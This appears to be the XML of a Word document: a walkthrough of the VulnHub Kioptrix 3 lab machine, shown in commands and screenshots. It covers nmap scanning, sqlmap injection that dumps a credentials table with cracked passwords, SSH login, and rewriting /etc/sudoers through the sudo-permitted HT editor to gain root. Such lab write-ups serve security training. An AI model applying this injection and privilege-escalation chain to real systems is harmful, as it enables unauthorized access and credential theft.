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55B" w:rsidRDefault="00DB155B">
      <w:r>
        <w:t xml:space="preserve">VM: </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="000B57E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.vulnhub.com/entry/kioptrix-level-12-3,24/#download</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00456366" w:rsidRDefault="00623E6D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13A52E9D" wp14:editId="23B02AB2">
            <wp:extent cx="5943600" cy="1597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6D" w:rsidRDefault="00623E6D"/>
    <w:p w:rsidR="00341D63" w:rsidRDefault="00341D63" w:rsidP="00341D63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341D63" w:rsidRDefault="00341D63" w:rsidP="00341D63">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -A 192.168.21.158</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00341D63" w:rsidRDefault="00495004" w:rsidP="00341D63">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A62F758" wp14:editId="41E6A4B6">
            <wp:extent cx="5943600" cy="2282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04" w:rsidRDefault="00F643FF" w:rsidP="00341D63">
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="000B57E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.21.158/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F643FF" w:rsidRDefault="004E236C" w:rsidP="00341D63">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29410AB1" wp14:editId="22A78962">
            <wp:extent cx="5943600" cy="2327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6C" w:rsidRDefault="007A5D0A" w:rsidP="00341D63">
      <w:r w:rsidRPr="007A5D0A">
        <w:t>Click on the Blog option and below page will appear. Here we will get a clue to check out the page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A5D0A" w:rsidRDefault="00141ECF" w:rsidP="00341D63">
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="000B57E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.21.158/index.php?system=Blog</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00141ECF" w:rsidRDefault="00141ECF" w:rsidP="00341D63">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49AFA23E" wp14:editId="37ABE025">
            <wp:extent cx="5943600" cy="2839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EE" w:rsidRDefault="00142CEE" w:rsidP="00142CE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141ECF" w:rsidRDefault="00142CEE" w:rsidP="00142CEE">
      <w:r>
        <w:t>└─# cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/hosts | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 192.168.21.158</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00142CEE" w:rsidRDefault="00142CEE" w:rsidP="00142CEE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="149F4F47" wp14:editId="2AA156B2">
            <wp:extent cx="3314700" cy="60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EE" w:rsidRDefault="0080409D" w:rsidP="00142CEE">
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="000B57E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://kioptrix3.com/gallery/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0080409D" w:rsidRDefault="0080409D" w:rsidP="00142CEE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C9C8996" wp14:editId="2F85AE26">
            <wp:extent cx="5943600" cy="363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5B" w:rsidRDefault="00BB191A" w:rsidP="00CD775B">
      <w:r>
        <w:t>In place of sorting options -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>&gt;  photo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB191A" w:rsidRDefault="00DB5E54" w:rsidP="00CD775B">
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="000B57E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://kioptrix3.com/gallery/gallery.php?id=1&amp;sort=photoid#photos</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DB5E54" w:rsidRDefault="00965B57" w:rsidP="00CD775B">
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="000B57E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://kioptrix3.com/gallery/gallery.php?id=1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F30EBD" w:rsidRDefault="00F30EBD" w:rsidP="00F30EBD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965B57" w:rsidRDefault="00F30EBD" w:rsidP="00F30EBD">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u kioptrix3.com/gallery/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gallery.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=1 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –batch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F30EBD" w:rsidRDefault="005476F3" w:rsidP="00F30EBD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F976D09" wp14:editId="4E5F5539">
            <wp:extent cx="5648325" cy="619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F3" w:rsidRDefault="005476F3" w:rsidP="00F30EBD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="597B33CC" wp14:editId="0E9C257A">
            <wp:extent cx="2057400" cy="657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2F" w:rsidRDefault="00811D2F" w:rsidP="00811D2F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5476F3" w:rsidRDefault="00811D2F" w:rsidP="00811D2F">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u kioptrix3.com/gallery/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gallery.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">=1 -T </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dev_accounts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t>dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811D2F" w:rsidRDefault="00F20117" w:rsidP="00811D2F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F1F9C17" wp14:editId="48A60A9F">
            <wp:extent cx="5943600" cy="2816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17" w:rsidRDefault="00B95378" w:rsidP="00811D2F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28D5346D" wp14:editId="5259FFE4">
            <wp:extent cx="5676900" cy="143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23" w:rsidRDefault="00253623" w:rsidP="00253623">
      <w:r>
        <w:t>+----+---------------------------------------------+------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00253623" w:rsidRDefault="00253623" w:rsidP="00253623">
      <w:r>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> | password                                    | username   |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00253623" w:rsidRDefault="00253623" w:rsidP="00253623">
      <w:r>
        <w:t>+----+---------------------------------------------+------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00253623" w:rsidRDefault="00253623" w:rsidP="00253623">
      <w:r>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   | dreg       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00253623" w:rsidRDefault="00253623" w:rsidP="00253623">
      <w:r>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>2  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 5badcaf789d3d1d09794d8f021f40f0e (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>starwars</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>loneferret</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B95378" w:rsidRDefault="00253623" w:rsidP="00253623">
      <w:r>
        <w:t>+----+---------------------------------------------+------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D171B" w:rsidRDefault="006D171B" w:rsidP="00A44EC1"/>
    <w:p w:rsidR="00A44EC1" w:rsidRDefault="00A44EC1" w:rsidP="00A44EC1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253623" w:rsidRDefault="00A44EC1" w:rsidP="00A44EC1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loneferret@192.168.21.158</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E937F9" w:rsidRDefault="008B38F9" w:rsidP="00CD775B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="773E6211" wp14:editId="1B5888F9">
            <wp:extent cx="5943600" cy="2954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F9" w:rsidRDefault="0001505B" w:rsidP="00CD775B">
      <w:r w:rsidRPr="0001505B">
        <w:t>loneferret@Kioptrix3:~$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001505B" w:rsidRDefault="00961885" w:rsidP="00CD775B">
      <w:r w:rsidRPr="00961885">
        <w:t xml:space="preserve">loneferret@Kioptrix3:~$ cat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00961885">
        <w:t>CompanyPolicy.README</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00961885" w:rsidRDefault="00961885" w:rsidP="00CD775B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DA5A5F3" wp14:editId="32547FF6">
            <wp:extent cx="5943600" cy="1320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85" w:rsidRDefault="003A7C8F" w:rsidP="00CD775B">
      <w:r w:rsidRPr="003A7C8F">
        <w:t xml:space="preserve">loneferret@Kioptrix3:~$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A7C8F">
        <w:t>whereis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A7C8F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A7C8F">
        <w:t>ht</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003A7C8F" w:rsidRDefault="003A7C8F" w:rsidP="00CD775B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D3D3E74" wp14:editId="2383010D">
            <wp:extent cx="2781300" cy="57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8F" w:rsidRDefault="00355B95" w:rsidP="00CD775B">
      <w:r w:rsidRPr="00355B95">
        <w:t xml:space="preserve">loneferret@Kioptrix3:~$ which </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00355B95">
        <w:t>ht</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00355B95" w:rsidRDefault="00355B95" w:rsidP="00CD775B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3204E026" wp14:editId="30A3CB85">
            <wp:extent cx="2686050" cy="57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95" w:rsidRDefault="006F7EF6" w:rsidP="00CD775B">
      <w:r w:rsidRPr="006F7EF6">
        <w:t>loneferret@Kioptrix3:~$ ls -la /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F7EF6">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F7EF6">
        <w:t>/local/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F7EF6">
        <w:t>ht</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006F7EF6" w:rsidRDefault="006F7EF6" w:rsidP="00CD775B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C4B6C88" wp14:editId="35DC1F06">
            <wp:extent cx="5400675" cy="361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F6" w:rsidRDefault="00763B05" w:rsidP="00CD775B">
      <w:r w:rsidRPr="00763B05">
        <w:t xml:space="preserve">loneferret@Kioptrix3:~$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00763B05">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00763B05">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00763B05">
        <w:t>l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00763B05" w:rsidRDefault="00763B05" w:rsidP="00CD775B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4610C15F" wp14:editId="0ABD4AB0">
            <wp:extent cx="4743450" cy="676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05" w:rsidRDefault="00644A12" w:rsidP="00CD775B">
      <w:r w:rsidRPr="00644A12">
        <w:t xml:space="preserve">loneferret@Kioptrix3:~$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00644A12">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00644A12">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00644A12">
        <w:t>ht</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00644A12">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00644A12">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00644A12">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00644A12">
        <w:t>sudoers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00644A12" w:rsidRDefault="00644A12" w:rsidP="00CD775B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="052B32A5" wp14:editId="66F904F0">
            <wp:extent cx="3686175" cy="542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38" w:rsidRDefault="00983238" w:rsidP="00983238">
      <w:r>
        <w:t>loneferret@Kioptrix3:~$ export TERM=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xterm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-color</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00644A12" w:rsidRDefault="00983238" w:rsidP="00983238">
      <w:r>
        <w:t xml:space="preserve">loneferret@Kioptrix3:~$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ht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:rsidR="00983238" w:rsidRDefault="00983238" w:rsidP="00983238">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="403A2692" wp14:editId="7A55F77C">
            <wp:extent cx="5943600" cy="4154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91" w:rsidRDefault="003B7D91" w:rsidP="003B7D91">
      <w:r>
        <w:t>Once done, the HT editor will open up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00983238" w:rsidRDefault="003B7D91" w:rsidP="003B7D91">
      <w:r>
        <w:t>Press F3 to open the file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A44EC1" w:rsidRDefault="00DE75D5" w:rsidP="00CD775B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F01A7CD" wp14:editId="3F11E72E">
            <wp:extent cx="5943600" cy="3284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C8" w:rsidRDefault="00491FC8" w:rsidP="00491FC8">
      <w:r>
        <w:t>Below is snippet of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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>file .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Edit the file so that we can use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> without limitations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00491FC8" w:rsidRDefault="00491FC8" w:rsidP="00491FC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41B38B04" wp14:editId="398DE301">
            <wp:extent cx="4810125" cy="3238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C8" w:rsidRDefault="00491FC8" w:rsidP="00491FC8"/>
    <w:p w:rsidR="00491FC8" w:rsidRDefault="00491FC8" w:rsidP="00491FC8">
      <w:r>
        <w:t>Refer the below entry in the file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE75D5" w:rsidRDefault="00491FC8" w:rsidP="00491FC8">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>loneferret</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ALL= NOPASSWD:  !/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> , /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/local/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ht</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="004A2714" w:rsidRDefault="004A2714" w:rsidP="00491FC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D4C07B6" wp14:editId="25C30B52">
            <wp:extent cx="5943600" cy="3110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14" w:rsidRDefault="004A2714" w:rsidP="00491FC8"/>
    <w:p w:rsidR="004A2714" w:rsidRDefault="004A2714" w:rsidP="004A2714">
      <w:r>
        <w:t xml:space="preserve">Now change the entry for the user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>loneferret</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as follows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A2714" w:rsidRDefault="004A2714" w:rsidP="004A2714">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>loneferret</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ALL= (ALL) NOPASSWD: ALL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009507A7" w:rsidRDefault="009507A7" w:rsidP="004A2714">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BDD290A" wp14:editId="263B27BA">
            <wp:extent cx="5943600" cy="31959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A7" w:rsidRDefault="006F4AB7" w:rsidP="004A2714">
      <w:r>
        <w:t>Press ctrl + z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F4AB7" w:rsidRDefault="006F4AB7" w:rsidP="004A2714">
      <w:r w:rsidRPr="006F4AB7">
        <w:t xml:space="preserve">loneferret@Kioptrix3:~$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F4AB7">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F4AB7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F4AB7">
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006F4AB7" w:rsidRDefault="006F4AB7" w:rsidP="004A2714">
      <w:r w:rsidRPr="006F4AB7">
        <w:t>root@Kioptrix3:/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F4AB7">
        <w:t>loneferret</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F4AB7">
        <w:t># cd /root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F4AB7" w:rsidRDefault="006F4AB7" w:rsidP="004A2714">
      <w:r w:rsidRPr="006F4AB7">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">root@Kioptrix3:~# ls </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F4AB7">
        <w:t>lrt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006F4AB7" w:rsidRDefault="006F4AB7" w:rsidP="004A2714">
      <w:r w:rsidRPr="006F4AB7">
        <w:t>root@Kioptrix3:~# cat Congrats.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F4AB7" w:rsidRDefault="006F4AB7" w:rsidP="004A2714">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2219A394" wp14:editId="00DE5555">
            <wp:extent cx="5943600" cy="59188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B7" w:rsidRDefault="006F4AB7" w:rsidP="004A2714"/>
    <w:p w:rsidR="006F4AB7" w:rsidRDefault="006F4AB7" w:rsidP="004A2714">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="006F4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D77"/>
    <w:rsid w:val="0001505B"/>
    <w:rsid w:val="00141ECF"/>
    <w:rsid w:val="00142CEE"/>
    <w:rsid w:val="00226D77"/>
    <w:rsid w:val="00253623"/>
    <w:rsid w:val="00341D63"/>
    <w:rsid w:val="00355B95"/>
    <w:rsid w:val="003A7C8F"/>
    <w:rsid w:val="003B7D91"/>
    <w:rsid w:val="00456366"/>
    <w:rsid w:val="00491FC8"/>
    <w:rsid w:val="00495004"/>
    <w:rsid w:val="004A2714"/>
    <w:rsid w:val="004E236C"/>
    <w:rsid w:val="005476F3"/>
    <w:rsid w:val="00623E6D"/>
    <w:rsid w:val="00644A12"/>
    <w:rsid w:val="006D171B"/>
    <w:rsid w:val="006F4AB7"/>
    <w:rsid w:val="006F7EF6"/>
    <w:rsid w:val="00763B05"/>
    <w:rsid w:val="007A5D0A"/>
    <w:rsid w:val="0080409D"/>
    <w:rsid w:val="00811D2F"/>
    <w:rsid w:val="008B38F9"/>
    <w:rsid w:val="009507A7"/>
    <w:rsid w:val="00961885"/>
    <w:rsid w:val="00965B57"/>
    <w:rsid w:val="00983238"/>
    <w:rsid w:val="00A44EC1"/>
    <w:rsid w:val="00B67F87"/>
    <w:rsid w:val="00B95378"/>
    <w:rsid w:val="00BB191A"/>
    <w:rsid w:val="00CD775B"/>
    <w:rsid w:val="00DB155B"/>
    <w:rsid w:val="00DB5E54"/>
    <w:rsid w:val="00DE75D5"/>
    <w:rsid w:val="00E937F9"/>
    <w:rsid w:val="00F20117"/>
    <w:rsid w:val="00F30EBD"/>
    <w:rsid w:val="00F6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AA93F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3696392C-6AA2-405A-A2A8-329793B5F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15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://192.168.21.158/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kioptrix3.com/gallery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hyperlink" Target="http://kioptrix3.com/gallery/gallery.php?id=1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hyperlink" Target="https://www.vulnhub.com/entry/kioptrix-level-12-3,24/#download" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.21.158/index.php?system=Blog" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kioptrix3.com/gallery/gallery.php?id=1&amp;sort=photoid#photo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377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67</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-08-07T07:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-07T08:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>